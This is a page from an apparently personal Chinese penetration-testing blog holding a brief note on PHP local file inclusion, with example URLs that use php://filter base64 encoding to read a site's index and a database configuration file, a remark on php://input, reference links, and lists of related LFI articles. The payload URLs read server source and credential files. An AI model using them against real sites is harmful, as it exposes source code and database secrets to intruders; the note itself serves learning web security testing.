j4s0nh4ck
- 浏览: 290896 次
-
文章分类
- 全部博客 (276)
- burp+hydra暴力破解 (1)
- kali linux工具集 (6)
- kali (59)
- linux (54)
- password (14)
- web (63)
- 渗透测试 (50)
- windows (40)
- metasploit (9)
- 信息收集 (32)
- burp suit (4)
- 安全审计 (9)
- https://github.com/secretsquirrel/the-backdoor-factory (0)
- nmap (4)
- arachni (2)
- 工具 (5)
- sql (3)
- 网络 (2)
- 后渗透测试 (10)
- 内网 (5)
- 无线 (2)
- C (3)
- bios (1)
- RoR (12)
- mongodb (1)
- linxu (1)
- gdb (1)
- linux,虚拟化 (1)
- python (4)
最新评论
1. LFI
http://www.example.com/index.php?m=php://filter/convert.base64-encode/resource=index
http://www.example.com/index.php?m=php://filter/read=convert.base64-encode/resource=../sqli/db.php
2. php://input可以等效于post数据
使用hackbar插件提交数据
然后使用mitmporxy抓包
参考:http://www.freebuf.com/articles/web/14097.html
https://www.idontplaydarts.com/2011/02/using-php-filter-for-local-file-inclusion/
http://www.example.com/index.php?m=php://filter/convert.base64-encode/resource=index
http://www.example.com/index.php?m=php://filter/read=convert.base64-encode/resource=../sqli/db.php
2. php://input可以等效于post数据
使用hackbar插件提交数据
然后使用mitmporxy抓包
参考:http://www.freebuf.com/articles/web/14097.html
https://www.idontplaydarts.com/2011/02/using-php-filter-for-local-file-inclusion/
分享到:
发表评论
-
linux 安装scrapy
2015-09-07 13:06 607由于scrapy对python3支持不是很好,所以使用pyth ... -
nginx reverse proxy cofinguration
2015-08-28 15:18 430based on our case, we need to h ... -
wpscan
2015-08-01 10:39 446https://www.digitalocean.com/co ... -
arachni-web-ui使用
2015-06-10 01:04 2149最近在玩儿arachni,想试试arachni-ui-web, ... -
HACKING NODEJS AND MONGODB
2015-06-04 23:52 346http://blog.websecurify.com/201 ... -
php object inject
2015-05-29 00:45 342解释: http://securitycafe.ro/2015 ... -
[转]Forcing XXE Reflection through Server Error Messages
2015-05-19 01:10 464原文地址:https://blog.netspi.com/fo ... -
CVE-2011-2461
2015-03-31 01:19 436http://blog.nibblesec.org/2015/ ... -
[译]从配置错误的web server中dump git数据
2015-03-26 01:07 600原文地址:https://blog.netspi.com/du ... -
[转]Microsoft Access sqli
2015-03-18 00:57 446https://milo2012.wordpress.com/ ... -
[转]sqlmap注入Microsoft Access
2015-03-18 00:49 1600https://github.com/sqlmapprojec ... -
crossdomain.xml
2015-03-12 01:23 683参考: https://hackerone.com/repor ... -
[译]使用wireshark解密TLS浏览器流量
2015-03-12 00:57 4145原文地址:https://jimshaver.net/2015 ... -
xxe方法
2015-02-01 18:32 854原文地址:http://www.christian-schne ... -
owasp zed--Web Sockets
2015-01-31 01:16 650http://digi.ninja/blog/zap_web_ ... -
memcached
2015-01-25 01:56 0http://www.sensepost.com/blog/4 ... -
[译]linux使用软连接读取本地文件
2015-01-25 00:28 1977原文地址:http://josipfranjkovic.blo ... -
linux install firefix&plugin
2015-01-22 20:56 4601. download firefox&plugins ... -
Sinatra--超级轻量级web框架
2015-01-17 00:30 672Sinatra是一个超轻量级web框架 介绍:http://w ... -
Shellshock示例
2014-12-19 01:21 323来自:http://pastebin.com/Qbgn09Wa ...
相关推荐
LFI基础:PHP LFI漏洞分析.docx LFI基础:PHP LFI漏洞分析all.docx LFI基础:PHP LFI漏洞分析_(10).PHP文件包含函数详解.docx LFI基础:PHP LFI漏洞分析_(11).LFI漏洞的常见误用场景.docx LFI基础:PHP LFI漏洞...
### LFI(本地文件包含)漏洞详解:PHP中的利用与防范 #### LFI漏洞概述 LFI(Local File Inclusion,本地文件包含)是一种常见的Web应用程序安全漏洞,它允许攻击者通过操纵应用程序输入来访问服务器上的任意文件...
lfi-labs, 用于实践开发 LFI RFI和CMD注入vulns的小型PHP脚本集 lfi实验室用于实践开发 LFI 。RFI和CMD注入vulns的小型PHP脚本集为什么?用于培训和测试。 你可以测试检测产品( 比如 。 漏洞扫描器),利用工具等。...
LFI基础:LFI的工作原理_(3).PHP中LFI漏洞的产生.docx LFI基础:LFI的工作原理_(4).LFI攻击方式.docx LFI基础:LFI的工作原理_(5).文件包含漏洞的分类.docx LFI基础:LFI的工作原理_(6).LFI漏洞的利用技巧....
LFI高级技巧:LFI与命令执行_(4).PHP代码中的LFI利用技巧.docx LFI高级技巧:LFI与命令执行_(5).基于文件包含的命令执行.docx LFI高级技巧:LFI与命令执行_(6).绕过文件包含限制的方法.docx LFI高级技巧:LFI...
LFI高级技巧:LFI与文件上传.docx LFI高级技巧:LFI与文件上传all.docx ...深入理解PHP文件处理函数.docx LFI高级技巧:LFI与文件上传_(7).绕过文件上传过滤与检测.docx LFI高级技巧:LFI与文件上
LFI高级技巧:LFI攻击的绕过技术....LFI高级技巧:LFI攻击的绕过技术_(2).PHP中的LFI绕过技术.docx LFI高级技巧:LFI攻击的绕过技术_(3).利用文件上传功能进行LFI攻击.docx LFI高级技巧:LFI攻击的绕过技术_(4)
LFI高级技巧:利用LFI读取敏感文件_(12).LFI与PHP伪协议的结合使用.docx LFI高级技巧:利用LFI读取敏感文件_(13).LFI与代码执行的结合使用.docx LFI高级技巧:利用LFI读取敏感文件_(14).LFI漏洞的检测方法....
LFI安全意识培训:Web应用的安全配置.docx LFI安全意识培训:Web应用的安全配置all.docx ...LFI安全意识培训:Web应用的安全配置_(5).PHP和其它服务器端脚本语言中的LFI防护.docx LFI安全意识培训:Web应用的安
LFI防护措施:使用安全的编程框架.docx LFI防护措施:使用安全的编程框架all.docx LFI防护措施:使用安全的编程框架_(10).文件系统权限管理.docx ...LFI防护措施:使用安全的编程框架_(5).PHP框架的安全特性.d
-h,--help显示此帮助消息并退出-u URL,--url = URL您要测试的URL: : page LFI --traversal -file = TRAVERSAL_FILE(OPTIONAL)指定您自己的文件以使用LFI搜索-默认情况下为/ etc / passwd,但是某些php过滤器将...
LFI防护措施:使用安全的文件包含函数_(2).PHP中的文件包含函数概述.docx LFI防护措施:使用安全的文件包含函数_(3).不安全的文件包含函数实例分析.docx LFI防护措施:使用安全的文件包含函数_(4).安全文件...
LFI_autoexploiter 自动利用LFI Web漏洞。 安装 就像这样简单:git clone ...--b64 B64如果给定1,则使用php base64提取 --url_enc URL_ENC如果给定1,则使用url编码 --null NULL如果给定1,则添加一个空字节 --
Toxin 利用特定(但也是常见)类型的本地文件包含 (LFI) 漏洞,攻击者可以利用该漏洞利用 PHP 的register_globals设置。 在这种攻击场景中,攻击者会制作一个自定义的User-Agent标头,其中包含任意 PHP 代码,这些...
例如,一个常见的LFI漏洞可能出现在PHP中的`include()`或`require()`函数,当它们的参数没有得到充分过滤或验证。 ### LFIPWN功能 LFIPWN提供以下核心功能: 1. **自动扫描**:LFIPWN可以自动化地对目标网站进行...
韦林 分阶段路径遍历和LFI攻击威伦3.0 从v3.0开始,Vailyn在阶段1中支持LFI PHP包装器。使用--lfi将它们包括在扫描中。关于Vailyn是用于路径遍历/目录爬网漏洞的多阶段漏洞分析和利用工具。 它的建立是为了使其性能...
LFiFreak, 具有绑定/反向外壳的独特自动化LFi开发人员 LFI怪胎 特性适用于 Windows,Linux和 OS X包括 Windows 和Linux的绑定和反向 shell用 python 2.7编写这是什么?使用PHP输入。PHP过滤器和数据URI方法开发本地...
3. **本地文件包含漏洞(LFI)**:与RFI类似,LFI允许攻击者读取服务器上的任意文件,包括配置文件、源代码、敏感日志等。通过巧妙构造URL,攻击者可以尝试获取敏感信息或进一步利用其他漏洞。防止LFI的方法是限制...
PHP包含漏洞通常分为两种类型:本地包含漏洞(Local File Inclusion, LFI)和远程包含漏洞(Remote File Inclusion, RFI)。LFI漏洞允许攻击者读取服务器上的任意文件,而RFI漏洞则更严重,因为它能让攻击者通过指定...